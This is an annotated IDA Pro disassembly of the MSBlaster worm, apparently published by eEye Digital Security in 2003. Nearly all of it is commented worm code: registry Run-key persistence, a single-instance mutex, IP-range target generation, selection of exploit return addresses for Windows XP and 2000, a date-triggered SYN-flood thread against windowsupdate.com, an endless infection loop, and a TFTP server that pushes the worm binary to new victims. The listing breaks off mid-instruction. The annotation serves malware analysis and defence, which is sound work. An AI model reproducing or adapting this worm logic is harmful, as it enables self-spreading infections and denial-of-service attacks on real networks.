.text:00401000 ; .text:00401000 ; +-------------------------------------------------------------------------+ .text:00401000 ; | This file is generated by The Interactive Disassembler (IDA) | .text:00401000 ; | Copyright (c) 2003 by DataRescue sa/nv, | .text:00401000 ; +-------------------------------------------------------------------------+ .text:00401000 ; .text:00401000 ; MSBlaster worm disassembly by eEye Digital Security, Inc., August 12, 2003. .text:00401000 ; .text:00401000 ; Riley Hassell / Barnaby Jack / Ryan Permeh / Derek Soeder / Yuji Ukai .text:00401000 ; .text:00401000 ; Go to function WinMain() at 00401250 for the beginning of the worm code .text:00401000 ; itself. Code before 00401250 and after 00402157 is standard CRT stuff and .text:00401000 ; is therefore not commented. .text:00401000 ; .text:00401000 ; --------------------------------------------------------------------------- .text:00401000 ; File Name : msblast.exe.unpacked .text:00401000 ; Format : Portable executable for IBM PC (PE) .text:00401000 ; Section 1. (virtual address 00001000) .text:00401000 ; Virtual size : 00001458 ( 5208.) .text:00401000 ; Section size in file : 00001458 ( 5208.) .text:00401000 ; Offset to raw data for section: 00000400 .text:00401000 ; Flags 60000020: Text Executable Readable .text:00401000 ; Alignment : 16 bytes ? .text:00401000 .text:00401000 .text:00401000 unicode macro page,string,zero .text:00401000 irpc c, .text:00401000 db '&c', page .text:00401000 endm .text:00401000 ifnb .text:00401000 dw zero .text:00401000 endif .text:00401000 endm .text:00401000 .text:00401000 model flat .text:00401000 .text:00401000 ; --------------------------------------------------------------------------- .text:00401000 .text:00401000 ; Segment type: Pure code .text:00401000 ; Segment permissions: Read/Execute .text:00401000 _text segment para public 'CODE' use32 .text:00401000 assume cs:_text .text:00401000 ;org 401000h .text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing .text:00401000 .text:00401000 loc_401000: ; DATA XREF: sub_401020+Avo .text:00401000 xor eax, eax .text:00401002 inc eax .text:00401003 mov ecx, [esp+4] .text:00401007 test dword ptr [ecx+4], 6 .text:0040100E jz short locret_40101F .text:00401010 mov eax, [esp+8] .text:00401014 mov edx, [esp+10h] .text:00401018 mov [edx], eax .text:0040101A mov eax, 3 .text:0040101F .text:0040101F locret_40101F: ; CODE XREF: .text:0040100E^j .text:0040101F retn .text:00401020 .text:00401020 ; =============== S U B R O U T I N E ======================================= .text:00401020 .text:00401020 .text:00401020 sub_401020 proc near ; CODE XREF: .text:0040110Dvp .text:00401020 ; .text:00401138vp .text:00401020 .text:00401020 var_8 = dword ptr -8 .text:00401020 arg_0 = dword ptr 10h .text:00401020 arg_4 = dword ptr 14h .text:00401020 .text:00401020 push ebx .text:00401021 push esi .text:00401022 push edi .text:00401023 mov eax, [esp+arg_0] .text:00401027 push eax .text:00401028 push 0FFFFFFFEh .text:0040102A push offset loc_401000 .text:0040102F push large dword ptr fs:0 .text:00401036 mov large fs:0, esp .text:0040103D .text:0040103D loc_40103D: ; CODE XREF: sub_401020+44vj .text:0040103D ; sub_401020+4Avj .text:0040103D mov eax, [esp+10h+arg_0] .text:00401041 mov ebx, [eax+8] .text:00401044 mov esi, [eax+0Ch] .text:00401047 cmp esi, 0FFFFFFFFh .text:0040104A jz short loc_40106C .text:0040104C cmp esi, [esp+10h+arg_4] .text:00401050 jz short loc_40106C .text:00401052 lea esi, [esi+esi*2] .text:00401055 mov ecx, [ebx+esi*4] .text:00401058 mov ecx, [esp+10h+var_8] .text:0040105C mov ecx, [eax+0Ch] .text:0040105F cmp dword ptr [ebx+esi*4+4], 0 .text:00401064 jnz short loc_40103D .text:00401066 call dword ptr [ebx+esi*4+8] .text:0040106A jmp short loc_40103D .text:0040106C ; --------------------------------------------------------------------------- .text:0040106C .text:0040106C loc_40106C: ; CODE XREF: sub_401020+2A^j .text:0040106C ; sub_401020+30^j .text:0040106C pop large dword ptr fs:0 .text:00401073 add esp, 0Ch .text:00401076 pop edi .text:00401077 pop esi .text:00401078 pop ebx .text:00401079 retn .text:00401079 sub_401020 endp .text:00401079 .text:0040107A .text:0040107A ; =============== S U B R O U T I N E ======================================= .text:0040107A .text:0040107A ; Attributes: bp-based frame .text:0040107A .text:0040107A sub_40107A proc near ; CODE XREF: .text:00401100vp .text:0040107A .text:0040107A arg_0 = dword ptr 8 .text:0040107A .text:0040107A push ebp .text:0040107B mov ebp, esp .text:0040107D push ebx .text:0040107E push esi .text:0040107F push edi .text:00401080 push ebp .text:00401081 push 0 .text:00401083 push 0 .text:00401085 push offset loc_401092 .text:0040108A push [ebp+arg_0] .text:0040108D call RtlUnwind .text:00401092 .text:00401092 loc_401092: ; DATA XREF: sub_40107A+B^o .text:00401092 pop ebp .text:00401093 pop edi .text:00401094 pop esi .text:00401095 pop ebx .text:00401096 mov esp, ebp .text:00401098 pop ebp .text:00401099 retn .text:00401099 sub_40107A endp .text:00401099 .text:0040109A ; --------------------------------------------------------------------------- .text:0040109A .text:0040109A loc_40109A: ; DATA XREF: start+10vo .text:0040109A cld .text:0040109B push ebp .text:0040109C mov ebp, esp .text:0040109E sub esp, 8 .text:004010A1 push ebx .text:004010A2 push esi .text:004010A3 push edi .text:004010A4 push ebp .text:004010A5 mov ebx, [ebp+0Ch] .text:004010A8 mov eax, [ebp+8] .text:004010AB mov dword_404030, eax .text:004010B0 mov dword_404034, ebx .text:004010B6 test dword ptr [eax+4], 6 .text:004010BD jnz short loc_401131 .text:004010BF mov [ebp-8], eax .text:004010C2 mov eax, [ebp+10h] .text:004010C5 mov [ebp-4], eax .text:004010C8 mov dword_404034, eax .text:004010CD lea eax, [ebp-8] .text:004010D0 mov [ebx-4], eax .text:004010D3 mov esi, [ebx+0Ch] .text:004010D6 mov edi, [ebx+8] .text:004010D9 .text:004010D9 loc_4010D9: ; CODE XREF: .text:0040112Bvj .text:004010D9 cmp esi, 0FFFFFFFFh .text:004010DC jz short loc_401140 .text:004010DE lea ecx, [esi+esi*2] .text:004010E1 cmp dword ptr [edi+ecx*4+4], 0 .text:004010E6 jz short loc_401122 .text:004010E8 push esi .text:004010E9 push ebp .text:004010EA lea ebp, [ebx+10h] .text:004010ED call dword ptr [edi+ecx*4+4] .text:004010F1 pop ebp .text:004010F2 pop esi .text:004010F3 mov ebx, [ebp+0Ch] .text:004010F6 or eax, eax .text:004010F8 jz short loc_401122 .text:004010FA js short loc_40112D .text:004010FC mov edi, [ebx+8] .text:004010FF push ebx .text:00401100 call sub_40107A .text:00401105 add esp, 4 .text:00401108 lea ebp, [ebx+10h] .text:0040110B push esi .text:0040110C push ebx .text:0040110D call sub_401020 .text:00401112 add esp, 8 .text:00401115 lea ecx, [esi+esi*2] .text:00401118 mov eax, [edi+ecx*4] .text:0040111B mov eax, [ebx+0Ch] .text:0040111E call dword ptr [edi+ecx*4+8] .text:00401122 .text:00401122 loc_401122: ; CODE XREF: .text:004010E6^j .text:00401122 ; .text:004010F8^j .text:00401122 mov edi, [ebx+8] .text:00401125 lea ecx, [esi+esi*2] .text:00401128 mov esi, [edi+ecx*4] .text:0040112B jmp short loc_4010D9 .text:0040112D ; --------------------------------------------------------------------------- .text:0040112D .text:0040112D loc_40112D: ; CODE XREF: .text:004010FA^j .text:0040112D xor eax, eax .text:0040112F jmp short loc_4011A2 .text:00401131 ; --------------------------------------------------------------------------- .text:00401131 .text:00401131 loc_401131: ; CODE XREF: .text:004010BD^j .text:00401131 push ebp .text:00401132 lea ebp, [ebx+10h] .text:00401135 push 0FFFFFFFFh .text:00401137 push ebx .text:00401138 call sub_401020 .text:0040113D add esp, 0Ch .text:00401140 .text:00401140 loc_401140: ; CODE XREF: .text:004010DC^j .text:00401140 push 0 .text:00401142 mov dword_404010, 0Bh .text:0040114C push 0Bh .text:0040114E call signal .text:00401153 add esp, 8 .text:00401156 or eax, eax .text:00401158 jnz short loc_40117B .text:0040115A push 0 .text:0040115C mov dword_404010, 8 .text:00401166 push 8 .text:00401168 call signal .text:0040116D add esp, 8 .text:00401170 or eax, eax .text:00401172 jnz short loc_40117B .text:00401174 mov eax, 1 .text:00401179 jmp short loc_4011A2 .text:0040117B ; --------------------------------------------------------------------------- .text:0040117B .text:0040117B loc_40117B: ; CODE XREF: .text:00401158^j .text:0040117B ; .text:00401172^j .text:0040117B cmp eax, 0FFFFFFFFh .text:0040117E jz short loc_4011AA .text:00401180 push eax .text:00401181 push dword_404010 .text:00401187 call signal .text:0040118C add esp, 8 .text:0040118F push dword_404010 .text:00401195 call raise .text:0040119A add esp, 4 .text:0040119D mov eax, 1 .text:004011A2 .text:004011A2 loc_4011A2: ; CODE XREF: .text:0040112F^j .text:004011A2 ; .text:00401179^j ... .text:004011A2 pop ebp .text:004011A3 pop edi .text:004011A4 pop esi .text:004011A5 pop ebx .text:004011A6 mov esp, ebp .text:004011A8 pop ebp .text:004011A9 retn .text:004011AA ; --------------------------------------------------------------------------- .text:004011AA .text:004011AA loc_4011AA: ; CODE XREF: .text:0040117E^j .text:004011AA cmp dword_40402C, 0 .text:004011B1 jnz short loc_4011BA .text:004011B3 mov eax, 1 .text:004011B8 jmp short loc_4011A2 .text:004011BA ; --------------------------------------------------------------------------- .text:004011BA .text:004011BA loc_4011BA: ; CODE XREF: .text:004011B1^j .text:004011BA mov eax, dword_40402C .text:004011BF push 0Bh .text:004011C1 jmp eax .text:004011C3 ; --------------------------------------------------------------------------- .text:004011C3 pop eax .text:004011C4 mov eax, 1 .text:004011C9 jmp short loc_4011A2 .text:004011CB .text:004011CB ; =============== S U B R O U T I N E ======================================= .text:004011CB .text:004011CB ; Attributes: bp-based frame .text:004011CB .text:004011CB public start .text:004011CB start proc near .text:004011CB .text:004011CB var_30 = word ptr -30h .text:004011CB var_18 = dword ptr -18h .text:004011CB var_4 = dword ptr -4 .text:004011CB .text:004011CB mov eax, large fs:0 .text:004011D1 push ebp .text:004011D2 mov ebp, esp .text:004011D4 push 0FFFFFFFFh .text:004011D6 push offset unk_40401C .text:004011DB push offset loc_40109A .text:004011E0 push eax .text:004011E1 mov large fs:0, esp .text:004011E8 sub esp, 10h .text:004011EB push ebx .text:004011EC push esi .text:004011ED push edi .text:004011EE mov [ebp+var_18], esp .text:004011F1 push eax .text:004011F2 fnstcw [esp+30h+var_30] .text:004011F5 or word ptr [esp], 300h .text:004011FB fldcw [esp+30h+var_30] .text:004011FE add esp, 4 .text:00401201 push 0 .text:00401203 push 0 .text:00401205 push offset dword_404028 .text:0040120A push offset dword_404024 .text:0040120F push offset dword_404020 .text:00401214 call __GetMainArgs .text:00401219 push dword_404028 .text:0040121F push dword_404024 .text:00401225 push dword_404020 .text:0040122B mov dword_404014, esp .text:00401231 call sub_402254 .text:00401236 add esp, 18h .text:00401239 xor ecx, ecx .text:0040123B mov [ebp+var_4], ecx .text:0040123E push eax .text:0040123F call exit .text:00401244 leave .text:00401245 retn .text:00401245 start endp .text:00401245 .text:00401245 ; --------------------------------------------------------------------------- .text:00401246 align 4 .text:00401248 mov large fs:0, eax .text:0040124E retn .text:0040124E ; --------------------------------------------------------------------------- .text:0040124F align 4 .text:00401250 .text:00401250 ; =============== S U B R O U T I N E ======================================= .text:00401250 .text:00401250 ; Attributes: bp-based frame .text:00401250 .text:00401250 WinMain proc near ; CODE XREF: sub_402254+5Cvp .text:00401250 .text:00401250 in = in_addr ptr -3ACh .text:00401250 var_3A8 = dword ptr -3A8h .text:00401250 var_3A4 = dword ptr -3A4h .text:00401250 name = byte ptr -3A0h .text:00401250 WSAData = WSAData ptr -1A0h .text:00401250 szMonth = byte ptr -10h .text:00401250 szDay = byte ptr -0Ch .text:00401250 hKey = dword ptr -8 .text:00401250 ThreadId = dword ptr -4 .text:00401250 .text:00401250 push ebp .text:00401251 mov ebp, esp .text:00401253 sub esp, 3ACh .text:00401259 push esi .text:0040125A push edi .text:0040125B xor esi, esi .text:0040125D .text:0040125D Create/open HKLM\Software\Microsoft\Windows\CurrentVersion\Run .text:0040125D .text:0040125D push 0 ; lpdwDisposition .text:0040125F lea eax, [ebp+hKey] .text:00401262 push eax ; phkResult .text:00401263 push 0 ; lpSecurityAttributes .text:00401265 push 0F003Fh ; samDesired .text:0040126A push 0 ; dwOptions .text:0040126C push 0 ; lpClass .text:0040126E push 0 ; Reserved .text:00401270 push offset aSoftwareMicros ; lpSubKey .text:00401275 push 80000002h ; hKey = HKEY_LOCAL_MACHINE .text:0040127A call RegCreateKeyExA .text:0040127F .text:0040127F Create "windows auto update" string value = "msblast.exe" .text:0040127F .text:0040127F push 32h ; cbData (some extra here after null term) .text:00401281 push offset aMsblast_exe ; lpData .text:00401286 push 1 ; dwType = REG_SZ .text:00401288 push 0 ; Reserved .text:0040128A push offset aWindowsAutoUpd ; lpValueName .text:0040128F push [ebp+hKey] ; hKey .text:00401292 call RegSetValueExA .text:00401297 push [ebp+hKey] ; hKey .text:0040129A call RegCloseKey .text:0040129F .text:0040129F Create "BILLY" named mutex to prevent multiple infection .text:0040129F .text:0040129F push offset aBilly ; lpName .text:004012A4 push 1 ; bInitialOwner .text:004012A6 push 0 ; lpMutexAttributes .text:004012A8 call CreateMutexA .text:004012AD call GetLastError .text:004012B2 cmp eax, 0B7h ; 183 (0xB7): mutex already exists .text:004012B7 jnz short loc_4012C0 ; if BILLY mutex does not exist... continue here .text:004012B9 push 0 ; uExitCode .text:004012BB call ExitProcess .text:004012C0 .text:004012C0 Initialize Winsock .text:004012C0 .text:004012C0 loc_4012C0: ; CODE XREF: WinMain+67^j .text:004012C0 lea eax, [ebp+WSAData] ; if BILLY mutex does not exist... continue here .text:004012C6 push eax ; lpWSAData .text:004012C7 push 202h ; wVersionRequested (2.2) .text:004012CC call WSAStartup .text:004012D1 or eax, eax .text:004012D3 jz short loc_401304 .text:004012D5 lea eax, [ebp+WSAData] .text:004012DB push eax ; lpWSAData .text:004012DC push 101h ; wVersionRequested (1.1) .text:004012E1 call WSAStartup .text:004012E6 or eax, eax .text:004012E8 jz short loc_401304 .text:004012EA lea eax, [ebp+WSAData] .text:004012F0 push eax ; lpWSAData .text:004012F1 push 1 ; wVersionRequested (1.0) .text:004012F3 call WSAStartup .text:004012F8 or eax, eax .text:004012FA jz short loc_401304 .text:004012FC or eax, 0FFFFFFFFh .text:004012FF jmp loc_401570 ; return .text:00401304 ; --------------------------------------------------------------------------- .text:00401304 .text:00401304 loc_401304: ; CODE XREF: WinMain+83^j .text:00401304 ; WinMain+98^j ... .text:00401304 push 104h ; nSize .text:00401309 push offset Filename ; lpFilename .text:0040130E push 0 ; hModule .text:00401310 call GetModuleFileNameA ; get worm executable's file name (for fopen()'ing later) .text:00401315 .text:00401315 Wait until host is connected to Internet .text:00401315 .text:00401315 loc_401315: ; CODE XREF: WinMain+DEvj .text:00401315 push 0 ; sleep 20 second intervals until connected to Internet .text:00401317 lea eax, [ebp+ThreadId] .text:0040131A push eax .text:0040131B call InternetGetConnectedState .text:00401320 or eax, eax .text:00401322 jnz short loc_401330 ; start at beginning of subnet (x.x.x.0) .text:00401324 push 4E20h ; dwMilliseconds = 20000 (20 seconds) .text:00401329 call Sleep .text:0040132E jmp short loc_401315 ; sleep 20 second intervals until connected to Internet .text:00401330 ; --------------------------------------------------------------------------- .text:00401330 .text:00401330 Get IP address and selectively apply randomization .text:00401330 .text:00401330 loc_401330: ; CODE XREF: WinMain+D2^j .text:00401330 and ds:octet4, 0 ; start at beginning of subnet (x.x.x.0) .text:00401337 call GetTickCount .text:0040133C push eax .text:0040133D call srand ; seed random number generator with GetTickCount() .text:00401342 pop ecx .text:00401343 call rand .text:00401348 mov ecx, 0FEh .text:0040134D cdq .text:0040134E idiv ecx .text:00401350 mov edi, edx .text:00401352 inc edi .text:00401353 mov ds:synspoofoctet1, edi ; rand() % 254 .text:00401353 ; make first and second octets of spoofed SYN .text:00401353 ; source address random at first -- if we can't .text:00401353 ; get our local IP, then leave these random; .text:00401353 ; otherwise, replace them with our local IP's .text:00401353 ; first and second octets .text:00401359 call rand .text:0040135E mov ecx, 0FEh .text:00401363 cdq .text:00401364 idiv ecx .text:00401366 mov ds:synspoofoctet2, edx ; rand() % 254 .text:0040136C push 200h ; namelen .text:00401371 lea eax, [ebp+name] .text:00401377 push eax ; name .text:00401378 call gethostname ; get name of local machine for IP lookup .text:0040137D cmp eax, 0FFFFFFFFh .text:00401380 jz loc_401476 ; did gethostname() fail? .text:00401386 lea eax, [ebp+name] .text:0040138C push eax ; name .text:0040138D call gethostbyname ; now that we have machine name, get local IP address .text:00401392 mov [ebp+var_3A4], eax .text:00401398 or eax, eax .text:0040139A jz loc_401476 ; did gethostbyname() fail? .text:004013A0 mov ecx, [eax+0Ch] .text:004013A3 cmp dword ptr [ecx], 0 .text:004013A6 jz loc_401476 ; is *h_addr_list NULL? (couldn't get a local IP address) .text:004013AC push 4 ; sizeof(struct in_addr) = 4 .text:004013AE mov eax, [eax+0Ch] .text:004013B1 push dword ptr [eax] ; use ptr to first address in h_addr_list as source .text:004013B3 lea eax, [ebp+in] .text:004013B9 push eax ; dest is &[EBP+in], which is struct in_addr .text:004013BA call memcpy .text:004013BF push dword ptr [ebp+in.S_un] ; in .text:004013C5 call inet_ntoa .text:004013CA push eax .text:004013CB push offset aS ; "%s" .text:004013D0 lea edi, [ebp+name] .text:004013D6 push edi .text:004013D7 call sprintf .text:004013DC push offset a_ ; "." .text:004013E1 lea eax, [ebp+name] .text:004013E7 push eax .text:004013E8 call strtok ; get first octet from IP address string ("." is delimiter) .text:004013ED mov [ebp+var_3A8], eax .text:004013F3 push eax .text:004013F4 call atoi .text:004013F9 mov ds:octet1, eax .text:004013FE push offset a_ ; "." .text:00401403 push 0 .text:00401405 call strtok ; get second octet .text:0040140A mov [ebp+var_3A8], eax .text:00401410 push eax .text:00401411 call atoi .text:00401416 mov ds:octet2, eax .text:0040141B push offset a_ ; "." .text:00401420 push 0 .text:00401422 call strtok ; get third octet .text:00401427 mov [ebp+var_3A8], eax .text:0040142D push eax .text:0040142E call atoi .text:00401433 add esp, 3Ch .text:00401436 mov ds:octet3, eax .text:0040143B cmp eax, 14h .text:0040143E jle short loc_40145F ; third octet <= 20? .text:00401440 call GetTickCount .text:00401445 push eax .text:00401446 call srand .text:0040144B pop ecx .text:0040144C call rand .text:00401451 mov ecx, 14h .text:00401456 cdq .text:00401457 idiv ecx .text:00401459 sub ds:octet3, edx ; subtract (rand() % 20) from 3rd octet (if it's > 20) .text:0040145F .text:0040145F loc_40145F: ; CODE XREF: WinMain+1EE^j .text:0040145F mov eax, ds:octet1 ; use first and second octets of local IP for .text:0040145F ; spoofed source address of SYN packets .text:0040145F ; (this code will only be reached if we were .text:0040145F ; able to get the local machine's IP address) .text:00401464 mov ds:synspoofoctet1, eax .text:00401469 mov eax, ds:octet2 .text:0040146E mov ds:synspoofoctet2, eax .text:00401473 xor esi, esi .text:00401475 inc esi ; ESI = 1 .text:00401476 .text:00401476 loc_401476: ; CODE XREF: WinMain+130^j .text:00401476 ; WinMain+14A^j ... .text:00401476 call GetTickCount ; jump ahead to here if unable to get local IP .text:00401476 ; (note that ESI=0 if we jumped here after failing .text:00401476 ; to get our local IP, meaning that, in that case, .text:00401476 ; we'll always randomize the initial target IP) .text:0040147B push eax .text:0040147C call srand .text:00401481 pop ecx .text:00401482 call rand .text:00401487 mov ecx, 14h .text:0040148C cdq .text:0040148D idiv ecx .text:0040148F cmp edx, 0Ch ; EDX = random number from 0..19 .text:00401492 jge short loc_401496 ; ESI=1: 8/20 (40%) chance .text:00401494 xor esi, esi ; ESI=0: 12/20 (60%) chance .text:00401496 .text:00401496 Randomly decide which return address to use in the exploit .text:00401496 80%: dwWhichRetAddr = 1 -- Windows XP address (0100139Dh) .text:00401496 20%: dwWhichRetAddr = 2 -- Windows 2000 address (0018759Fh) .text:00401496 .text:00401496 loc_401496: ; CODE XREF: WinMain+242^j .text:00401496 mov ds:dwWhichRetAddr, 1 .text:004014A0 call rand .text:004014A5 mov ecx, 0Ah .text:004014AA cdq .text:004014AB idiv ecx .text:004014AD cmp edx, 7 ; EDX = rand() % 10 .text:004014B0 jle short loc_4014BC ; 8/10 (80%) chance: leave dwWhichRetAddr = 1 (XP ret addr) .text:004014B2 mov ds:dwWhichRetAddr, 2 ; 2/10 (20%) chance: set to 2 (Windows 2000 ret addr) .text:004014BC .text:004014BC 12/20 (60%) chance that the 1st, 2nd, and 3rd octets will be randomized: .text:004014BC 1st: 1..254 .text:004014BC 2nd: 0..253 .text:004014BC 3rd: 0..253 .text:004014BC .text:004014BC loc_4014BC: ; CODE XREF: WinMain+260^j .text:004014BC or esi, esi .text:004014BE jnz short loc_4014FC ; if ESI=1 (40% chance), DON'T randomize first 3 octets .text:004014C0 call rand .text:004014C5 mov ecx, 0FEh .text:004014CA cdq .text:004014CB idiv ecx .text:004014CD mov edi, edx .text:004014CF inc edi .text:004014D0 mov ds:octet1, edi ; (rand() % 254) + 1 .text:004014D6 call rand .text:004014DB mov ecx, 0FEh .text:004014E0 cdq .text:004014E1 idiv ecx .text:004014E3 mov ds:octet2, edx ; rand() % 254 .text:004014E9 call rand .text:004014EE mov ecx, 0FEh .text:004014F3 cdq .text:004014F4 idiv ecx .text:004014F6 mov ds:octet3, edx ; rand() % 254 .text:004014FC .text:004014FC Check date to decide whether or not to SYN flood windowsupdate.com .text:004014FC .text:004014FC loc_4014FC: ; CODE XREF: WinMain+26E^j .text:004014FC push 3 ; cchDate .text:004014FE lea eax, [ebp+szDay] .text:00401501 push eax ; lpDateStr .text:00401502 push offset aD ; lpFormat = "d" .text:00401507 push 0 ; lpDate .text:00401509 push 0 ; dwFlags .text:0040150B push 409h ; Locale .text:00401510 call GetDateFormatA .text:00401515 push 3 ; cchDate .text:00401517 lea eax, [ebp+szMonth] .text:0040151A push eax ; lpDateStr .text:0040151B push offset aM ; lpFormat = "M" .text:00401520 push 0 ; lpDate .text:00401522 push 0 ; dwFlags .text:00401524 push 409h ; Locale .text:00401529 call GetDateFormatA .text:0040152E lea eax, [ebp+szDay] .text:00401531 push eax .text:00401532 call atoi .text:00401537 pop ecx .text:00401538 cmp eax, 0Fh ; if day is after 15th... .text:0040153B jg short loc_40154C ; ...then SYN flood windowsupdate.com:80 .text:0040153D lea edi, [ebp+szMonth] .text:00401540 push edi .text:00401541 call atoi .text:00401546 pop ecx .text:00401547 cmp eax, 8 ; ...or month is after August (8)... .text:0040154A jle short loc_401562 ; infinitely call infection loop function .text:0040154C .text:0040154C If day is > 15 or month > 8 (August), create SYN flood thread .text:0040154C .text:0040154C loc_40154C: ; CODE XREF: WinMain+2EB^j .text:0040154C lea eax, [ebp+ThreadId] ; ...then SYN flood windowsupdate.com:80 .text:0040154F push eax ; lpThreadId .text:00401550 push 0 ; dwCreationFlags .text:00401552 push 0 ; lpParameter .text:00401554 push offset WUSYNFloodThread ; lpStartAddress .text:00401559 push 0 ; dwStackSize .text:0040155B push 0 ; lpThreadAttributes .text:0040155D call CreateThread .text:00401562 .text:00401562 Infect sequential IP addresses endlessly, 20 hosts at a time .text:00401562 .text:00401562 loc_401562: ; CODE XREF: WinMain+2FA^j .text:00401562 ; WinMain+317vj .text:00401562 call infect20Hosts ; infinitely call infection loop function .text:00401567 jmp short loc_401562 ; infinitely call infection loop function .text:00401569 ; --------------------------------------------------------------------------- .text:00401569 call WSACleanup .text:0040156E xor eax, eax .text:00401570 .text:00401570 loc_401570: ; CODE XREF: WinMain+AF^j .text:00401570 pop edi ; return .text:00401571 pop esi .text:00401572 leave .text:00401573 retn 10h .text:00401573 WinMain endp .text:00401573 .text:00401576 .text:00401576 ; =============== S U B R O U T I N E ======================================= .text:00401576 .text:00401576 ; Attributes: bp-based frame .text:00401576 .text:00401576 TFTPServerThread proc near ; DATA XREF: infectTarget+39Fvo .text:00401576 .text:00401576 buf = byte ptr -42Ch .text:00401576 name = sockaddr ptr -228h .text:00401576 to = sockaddr ptr -218h .text:00401576 tolen = dword ptr -208h .text:00401576 var_204 = word ptr -204h .text:00401576 var_202 = word ptr -202h .text:00401576 var_200 = byte ptr -200h .text:00401576 .text:00401576 push ebp .text:00401577 mov ebp, esp .text:00401579 sub esp, 42Ch .text:0040157F push ebx .text:00401580 push esi .text:00401581 push edi .text:00401582 mov dwTFTPInProgress, 1 .text:0040158C .text:0040158C loc_40158C: ; CODE XREF: TFTPServerThread+16Fvj .text:0040158C push 0 ; protocol = IPPROTO_IP .text:0040158E push 2 ; type = SOCK_DGRAM .text:00401590 push 2 ; af = AF_INET .text:00401592 call socket .text:00401597 mov ds:s, eax .text:0040159C cmp eax, 0FFFFFFFFh .text:0040159F jz loc_4016EA .text:004015A5 push 10h .text:004015A7 push 0 .text:004015A9 lea eax, [ebp+name] .text:004015AF push eax .text:004015B0 call memset .text:004015B5 add esp, 0Ch .text:004015B8 mov [ebp+name.sa_family], 2 .text:004015C1 push 45h ; hostshort = 69 (TFTP) .text:004015C3 call htons .text:004015C8 mov edx, eax .text:004015CA mov word ptr [ebp+name.sa_data], dx .text:004015D1 and dword ptr [ebp+name.sa_data+2], 0 .text:004015D8 push 10h ; namelen .text:004015DA lea eax, [ebp+name] .text:004015E0 push eax ; name .text:004015E1 push ds:s ; s .text:004015E7 call bind .text:004015EC or eax, eax .text:004015EE jnz loc_4016EA .text:004015F4 mov [ebp+tolen], 10h .text:004015FE lea eax, [ebp+tolen] .text:00401604 push eax ; fromlen .text:00401605 lea eax, [ebp+to] .text:0040160B push eax ; from .text:0040160C push 0 ; flags .text:0040160E push 204h ; len .text:00401613 lea eax, [ebp+buf] .text:00401619 push eax ; buf .text:0040161A push ds:s ; s .text:00401620 call recvfrom .text:00401625 cmp eax, 1 .text:00401628 jl loc_4016EA .text:0040162E xor ebx, ebx .text:00401630 push offset aRb ; "rb" .text:00401635 push offset Filename ; 260 (104h) = MAX_PATH .text:0040163A call fopen .text:0040163F add esp, 8 .text:00401642 mov esi, eax .text:00401644 or eax, eax .text:00401646 jz loc_4016EA .text:0040164C .text:0040164C loc_40164C: ; CODE XREF: TFTPServerThread+15Dvj .text:0040164C inc ebx .text:0040164D push 3 ; hostshort .text:0040164F call htons .text:00401654 mov edx, eax .text:00401656 mov [ebp+var_204], dx ; TFTP packet format: (all network order) .text:00401656 ; 0000 WORD = 3? .text:00401656 ; 0002 WORD chunk number (starts at 1) .text:00401656 ; 0004 start of data .text:0040165D mov eax, ebx .text:0040165F and eax, 0FFFFh .text:00401664 push eax ; hostshort .text:00401665 call htons .text:0040166A mov edx, eax .text:0040166C mov [ebp+var_202], dx .text:00401673 push esi .text:00401674 push 200h .text:00401679 push 1 .text:0040167B lea eax, [ebp+var_200] .text:00401681 push eax .text:00401682 call fread .text:00401687 add esp, 10h .text:0040168A mov edi, eax ; length actually read .text:0040168C add edi, 4 ; + 4 (for TFTP header) .text:0040168F push [ebp+tolen] ; tolen .text:00401695 lea eax, [ebp+to] .text:0040169B push eax ; to .text:0040169C push 0 ; flags .text:0040169E push edi ; len .text:0040169F lea eax, [ebp+var_204] .text:004016A5 push eax ; buf .text:004016A6 push ds:s ; s .text:004016AC call sendto .text:004016B1 cmp eax, 1 .text:004016B4 jl short loc_4016D8 .text:004016B6 push 384h ; dwMilliseconds .text:004016BB call Sleep ; sleep for 0.9 seconds .text:004016C0 cmp edi, 204h .text:004016C6 jnb short loc_4016D3 .text:004016C8 push esi .text:004016C9 call fclose .text:004016CE pop ecx .text:004016CF xor esi, esi .text:004016D1 jmp short loc_4016D8 .text:004016D3 ; --------------------------------------------------------------------------- .text:004016D3 .text:004016D3 loc_4016D3: ; CODE XREF: TFTPServerThread+150^j .text:004016D3 jmp loc_40164C .text:004016D8 ; --------------------------------------------------------------------------- .text:004016D8 .text:004016D8 loc_4016D8: ; CODE XREF: TFTPServerThread+13E^j .text:004016D8 ; TFTPServerThread+15B^j .text:004016D8 or esi, esi .text:004016DA jz short loc_4016EA .text:004016DC push esi .text:004016DD call fclose .text:004016E2 pop ecx .text:004016E3 jmp short loc_4016EA .text:004016E5 ; --------------------------------------------------------------------------- .text:004016E5 jmp loc_40158C .text:004016EA ; --------------------------------------------------------------------------- .text:004016EA .text:004016EA loc_4016EA: ; CODE XREF: TFTPServerThread+29^j .text:004016EA ; TFTPServerThread+78^j ... .text:004016EA and dwTFTPInProgress, 0 .text:004016F1 push ds:s ; s .text:004016F7 call closesocket .text:004016FC push 0 ; dwExitCode .text:004016FE call ExitThread .text:00401703 xor eax, eax .text:00401705 pop edi .text:00401706 pop esi .text:00401707 pop ebx .text:00401708 leave .text:00401709 retn 4 .text:00401709 TFTPServerThread endp .text:00401709 .text:0040170C .text:0040170C ; =============== S U B R O U T I N E ======================================= .text:0040170C .text:0040170C .text:0040170C incrementOctets proc near ; CODE XREF: incrementOctets+68vj .text:0040170C ; infect20Hosts+6Fvp .text:0040170C cmp ds:octet4, 0FEh .text:00401716 jle short loc_401727 ; increment 4th octet and stop if in range [0-254] .text:00401718 and ds:octet4, 0 ; 4th octet rolls over to 0; increment 3rd octet .text:0040171F inc ds:octet3 .text:00401725 jmp short loc_40172F ; stop if octet3 is now in range [0-254] .text:00401727 ; --------------------------------------------------------------------------- .text:00401727 .text:00401727 loc_401727: ; CODE XREF: incrementOctets+A^j .text:00401727 inc ds:octet4 ; increment 4th octet and stop if in range [0-254] .text:0040172D jmp short locret_401776 ; return .text:0040172F ; --------------------------------------------------------------------------- .text:0040172F .text:0040172F loc_40172F: ; CODE XREF: incrementOctets+19^j .text:0040172F cmp ds:octet3, 0FEh ; stop if octet3 is now in range [0-254] .text:00401739 jle short locret_401776 ; return .text:0040173B and ds:octet3, 0 ; 3rd octet rolls over to 0; increment 2nd octet .text:00401742 inc ds:octet2 .text:00401748 cmp ds:octet2, 0FEh ; stop if octet2 is now in range [0-254] .text:00401752 jle short locret_401776 ; return .text:00401754 and ds:octet2, 0 ; 2nd octet rolls over to 0; increment 1st octet .text:0040175B inc ds:octet1 .text:00401761 cmp 